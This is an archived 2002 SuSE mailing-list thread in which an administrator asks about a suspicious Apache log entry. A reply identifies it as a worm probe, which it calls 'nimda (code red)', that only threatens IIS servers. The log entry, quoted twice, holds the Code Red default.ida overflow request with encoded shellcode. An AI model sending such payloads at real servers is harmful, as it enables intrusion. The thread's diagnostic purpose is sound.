SuSE Apache - Hack Attemped
![](https://seccdn.libravatar.org/avatar/7f88c060e22f11c0b8a7e058d0258fe8.jpg?s=120&d=mm&r=g)
Thoe log below is from my apache access log. I've been noticing this allot from different ip's. Is this some sort of worm attack going around the net. And how up to date is SuSE8.0 version of apache ? 192.168.1.107 - - [19/Aug/2002:02:43:15 -0700] "GET /gif/powered_by_suse.gif HTTP/1.1" 200 8769 66.80.37.122 - - [19/Aug/2002:03:23:10 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 327 Rowan Reid Job Captain, Systems Administrator STUDIO 3 ARCHITECTS 909 982 1717
![](https://seccdn.libravatar.org/avatar/926aae47e9d1677af3799a66f39f330d.jpg?s=120&d=mm&r=g)
* Rowan Reid;
192.168.1.107 - - [19/Aug/2002:02:43:15 -0700] "GET /gif/powered_by_suse.gif HTTP/1.1" 200 8769 66.80.37.122 - - [19/Aug/2002:03:23:10 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 327
Looks like a nimda (code red) unless you have IIS server running no worry :-) -- Togan Muftuoglu Unofficial SuSE FAQ Maintainer http://dinamizm.ath.cx
participants (2)
-
Rowan Reid
-
Togan Muftuoglu